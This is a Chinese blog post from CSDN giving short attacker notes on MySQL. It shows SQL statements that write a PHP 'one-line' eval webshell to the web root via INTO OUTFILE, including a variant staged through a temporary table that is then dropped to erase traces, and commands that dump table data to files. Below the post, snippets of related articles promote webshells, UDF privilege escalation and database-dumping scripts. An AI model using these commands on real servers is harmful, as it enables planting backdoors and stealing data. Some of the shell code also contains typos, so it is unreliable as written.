MYSQL数据库脱库写马写一句话

最新推荐文章于 2024-05-13 03:42:09 发布
最新推荐文章于 2024-05-13 03:42:09 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: 数据库 安全漏洞 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010062917/article/details/105739807
版权

0x00 前提条件

权限: 必须是ROOT
secure_file_priv的限制
可以使用 mysql命令查询 show variables like '%secure%’;

secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

0x01 写入Websehll

  • 利用函数
  • - into dumpfile()
  • - into outfile()
  • - load_file()

01. 直接写入

注意:这个方法必须得是ROOT用户权限

  select '<php eval($_POST[shell])?>' into outfile 'c:\\shell.php'

02. 创建表单写入

1.先创建数据表

CREATE  table 'mysql'.'shell' ('webshell'  text not null)

2.向表单中写入一句话

insert Into  mysql.shell  values('<?php $eval($_POST[shell]);?>');

3.查询数据导出webshell

select 'webshell' from 'shell'  into outfile 'c:\\1.php'

4.删除表,清理痕迹。

drop table if exists 'shell'

0x02 脱库

0x1 Into outfile

select * from test into outfile '/tmp/test.txt'

0x2 Into dumpfile

 select * from test into dumpfile '/tmp/test.txt'

0x3 outfile 与dumpfile的脱裤区别

1.dumpfile只输出一行内容,outfile多行。
2.outfile函数在将数据写入到文件时会进行特殊格式转换 例如\n,则dumpfile则保持原数据格式。
在这里插入图片描述

WeUjie
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL马详解
jklbnm12的博客
08-14 1930
日志马 条件 1.全局变量general_log为ON MySQL的两个全局变量: general_log指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。 general_log_file 指的是日志的保存路径。 mysql> show global variables like "%general\_log%";+------------------+--------------------------------------------------------+|
一句话下tuo库
weixin_33890499的博客
03-15 91
条件限制不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。 这儿利用的是马儿的专家模式(自己代码)。 ini_set('display_errors', 1); set_time_limit(0); error_reporting(E_ALL); $connx = mysql_connect(":/var/tmp/mysql....
SQL注入-脱库_mysql注入拖库
最新发布
2401_84970035的博客
05-13 782
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
MYSQL数据库马讲解
qq_49422880的博客
04-01 2654
MYSQL数据库马讲解0x01 前言0x02 日志🐎0x03 into outfile🐎 0x01 前言   最近正好在上数据库的课程,比较详细地学习了数据库各个方面地知识。感觉解决了之前不少的疑惑,再吐槽一下(学校开数据库这门课开的太晚了!)   下面进行分析与讲解数据库入马的过程。 0x02 日志🐎 众所周知我们所有的数据库的都有一个存放日志的文件,这个文件可以会进行记录数据库的操作语句,也可能不会记录数据库的操作语句,这却决于两个全局变量: general_log==>日志保存状态,有
mysql 脱裤_mysql 脱裤(脱库)通用脚本
weixin_39987211的博客
01-18 621
TK:全面解密脱裤门内幕 --- hExIe Security Team...Mysql Database on Tables to Txt...This is a Php Example.#_E-mail:go_root@hotmail.com #_Author:HYrz--------------------------------------------------------Start M...
针对MYSQL数据注入时用到的 load_file()函数
dibodang1423的博客
05-16 255
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)...
教会你完全搞定MySQL数据库 轻松八句话
09-11
MySQL数据库是关系型数据库管理系统,广泛应用于各种规模的Web应用中。本文将教你如何轻松掌握MySQL数据库的基本操作,只需理解并实践以下八点,就能基本应对大部分数据库管理需求。 1. **连接MySQL**: 连接MySQL...
浅谈MySQL数据库性能优化
12-14
 这里先引用一句话,从内存中读取一个数据的时间消耗是微秒级别,而从普通硬盘上读取一个数据是在毫秒级别,二者相差3个数量级。可见,想对MySQL数据库进行优化,合理调配缓存参数显得更为直接  表缓存  相关...
mysql 本地数据库如何从远程数据库导数据
01-19
操作过程:打开【终端】,直接输入以下内容,点回车即可 就这一句话哦! 用途:将远程服务器的数据库拷到本地。 Java代码 代码如下: mysqldump -h ‘114.212.111.123’ -uROSE -pxxxooo –opt –compress ITSM –...
详解mysql数据库如何开启慢查询日志
12-15
在配置文件my.ini中加上下面两句话 log-slow-queries = C:\xampp\mysql_slow_query.log long_query_time=3 第一句使用来定义慢查询日志的路径(若是linux系统,会涉及权限问题) 第二句使用来定义用时超过过多少秒...
mysql脱库_mysql 脱裤(脱库)通用脚本
weixin_34638776的博客
01-28 2298
TK:全面解密脱裤门内幕 --- hExIe Security Team...Mysql Database on Tables to Txt...This is a Php Example.#_E-mail:go_root@hotmail.com #_Author:HYrz--------------------------------------------------------Start M...
PHP+MySQL脱库
07-02
PHP+MySQL脱库,WEBSHELL
MySQL提权专用网马
05-10
先前我发布了一个用于MYSQL提权的UDF,不过好像不少朋友不是很明白它的使用,不断有人问我它的使用方法,有人干脆叫我个此UDF的专用PHP。说实话在我这个PHP之前就只学过点ASP,对PHP那是一窍不通,所以程序中不妥之处在所难免,高手不要见笑。PHP的比较笨,这里就不讲它怎么的了,直接讲它的使用。 一、功能: 利用MYSQL的自定义函数功能(再次声明:利用MYSQL UDF提权绝非是溢出,而是MYSQL本身的一个功能),将MYSQL账号转化为系统system权限。 二、适用场合: 1.目标系统是Windows(Win2000,XP,Win2003);2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。 三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接 第二步:连接成功后,导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可,无需考虑权限问题),对于MYSQL5.0以上版本,你必须将DLL导出到目标机器的系统目录(win 或 system32),否则在下一步操作中你会看到"No paths allowed for shared library"错误。 三、使用帮助: 第一步:将PHP文件上传到目标机上,填入你的MYSQL账号经行连接。
MYSQL mssql脱裤
08-24
脱裤脚本 MYSQL mssql脱裤 脱网站数据必备
php mysql 软件直接连接脱裤
09-14
php mysql 软件直接连接脱裤,秒连接,过任何杀软,可以拖10T以上数据库
一句话专家模式”脱裤”
weixin_30394669的博客
08-22 79
条件限制不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。 这儿利用的是马儿的专家模式(自己代码)。 ini_set(‘display_errors’, 1); set_time_limit(0); error_reporting(E_ALL); $connx = mysql_connect(“:/var/tmp/mysql.sock”,...
mysql盲注脱裤_记一次猥琐的脱裤
weixin_35201989的博客
02-28 386
简介环境php+pdo+mysql+linuxFUCK IT因为是pdo,所以支持多行,一开始只用了时间盲注跑了用户表的列出来,然后可以通过多行语句执行updaet user set email=(select group_concat(table_name) from information_schema.columns where table_schema=database()) where ...
MySQL数据库及数据表的创建
qq_45013917的博客
01-22 552
MySQL数据库及数据表的创建
MySQL SQL 语句总结(一)脱离工具,命令行操作数据库
御剑长歌的博客
03-31 412
之前一直用Navicat对MySQL进行操作,感觉对sql的运用十分的少,今天记录下通过命令行操作MySQL的基本命令。 进入命令行 mysql -u root -p 注意这个如果path没有配置好 就必须进入mysql的Bin目录 输入密码 进入数据库 show databases; //查看所有数据库 查看当前使用的数据库 status //查看当前数据库状态 其中一行: c...
mysql数据库 - 单表查询(三)
06-28
### 回答1: MySQL数据库中的单表查询(三)可以使用以下语句实现: 1. SELECT DISTINCT 列名 FROM 表名; 这句话可以查询表中不重复的值。 2. SELECT 列名1, 列名2 FROM 表名 WHERE 条件; 这句话可以查询表中满足条件的记录,并显示指定列。 3. SELECT COUNT(列名) FROM 表名; 这句话可以统计表中记录的数量。 4. SELECT SUM(列名) FROM 表名; 这句话可以求和表中某一列的值。 5. SELECT AVG(列名) FROM 表名; 这句话可以求平均值表中某一列的值。 6. SELECT MAX(列名) FROM 表名; 这句话可以查询表中某一列的最大值。 7. SELECT MIN(列名) FROM 表名; 这句话可以查询表中某一列的最小值。 8. SELECT 列名 FROM 表名 ORDER BY 列名 [ASC|DESC]; 这句话可以对表中记录进行排序。 9. SELECT 列名 FROM 表名 LIMIT 开始位置, 显示记录数; 这句话可以限制结果显示的记录数。 ### 回答2: 在MySQL数据库单表查询的第三篇中,我们将学习适用于单表查询的一些高级查询技巧,使我们能够更有效地查询数据和优化查询性能。 1.使用DISTINCT关键字去除重复记录 在某些情况下,我们需要查询出一张表中的不重复的记录,此时可以使用DISTINCT关键字。DISTINCT关键字用于筛选出不同的值,查询所返回的结果集将去除重复数据。例如: SELECT DISTINCT name FROM student; 以上语句将会返回不同的name值。 2.使用ORDER BY排序查询结果 如果我们需要按照某个字段的值进行排序,就可以使用ORDER BY子句来实现。ORDER BY关键字默认按照升序排列,如果需要降序排列可以使用DESC关键字。例如: SELECT * FROM student ORDER BY age DESC; 以上查询语句将会按照age列的降序排列返回结果集。 3.使用LIMIT限制查询结果集的数量 当我们进行大量数据的查询时,使用LIMIT关键字来限制返回结果集的数量是一个非常有效的方法。 LIMIT子句用于指定查询的起始行和数据行数。例如: SELECT * FROM student LIMIT 10,5; 以上查询语句将返回从第11行开始的5行数据。 4.使用聚合函数查询数据 在MySQL中有五种聚合函数:COUNT、SUM、AVG、MAX、MIN。聚合函数用于对数据进行统计和计算。例如: SELECT COUNT(*) FROM student; 以上查询语句将返回student表中的记录数。 5.使用分组查询数据 GROUP BY子句用于将结果集按照指定列进行分组,一般与聚合函数一起使用。例如: SELECT age,COUNT(*) FROM student GROUP BY age; 以上查询语句将根据年龄对学生表进行分组,并统计每个年龄段学生的人数。 总之,单表查询是MySQL数据库中的重要部分,学习以上高级查询技巧能够更好地提高我们的查询效率和结果的准确性。 ### 回答3: MySQL数据库的单表查询是指在一个表中进行数据查询和筛选的操作。在进行单表查询的时候,需要注意一些基础的SQL语法和查询技巧。本文将介绍MySQL数据库单表查询的一些高级用法。 1. 条件查询 条件查询是单表查询最常用也最基础的一种查询方法。通过“WHERE”子句来限定查询的范围和条件,如: SELECT * FROM students WHERE age > 18; 这条语句将查询年龄大于18岁的学生信息。 同时,还可以使用“AND”和“OR”等逻辑运算符来组合多个查询条件: SELECT * FROM students WHERE age > 18 AND (gender = 'male' OR grade > 80); 这条语句将查询年龄大于18岁、并且性别为男性,或者成绩大于80分的学生信息。 2. 模糊查询 模糊查询是指在查询数据时,使用通配符匹配特定字符或字符串的查询方式。在MySQL中,常用的通配符有"%"和“_”,其中,"%"代表零个或多个字符,"_"代表一个字符。如: SELECT * FROM students WHERE name LIKE '%张%'; 这条语句将查询名字中包含“张”字符的学生信息。 3. 排序查询 排序查询是指按照某一列的值来对查询结果进行排序的操作。在MySQL中,通过“ORDER BY”子句来实现对查询结果的排序。如: SELECT * FROM students ORDER BY grade DESC; 这条语句将查询所有学生的信息,并按照成绩从高到低进行排序。 4. 分组查询 分组查询是指将数据按照某一列的值进行分组,并对每一组的数据进行统计分析的操作。在MySQL中,通过“GROUP BY”子句实现分组操作。如: SELECT grade, COUNT(*) FROM students GROUP BY grade; 这条语句将根据学生的成绩进行分组,并统计每组的学生数量。 5. 连接查询 连接查询是指在两个或多个表之间进行查询,通过关联查询得到所有相关数据的查询方式。在MySQL中,通过“JOIN”关键字实现表之间的连接。如: SELECT * FROM students JOIN scores ON students.id = scores.student_id; 这条语句将查询学生的信息和他们的成绩信息,同时通过“ON”子句将两个表进行关联查询。 综上所述,MySQL数据库的单表查询有很多复杂的查询方式,包括条件查询、模糊查询、排序查询、分组查询和连接查询等。在实际使用中,需要根据具体情况选择合适的查询方式,提高查询效率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值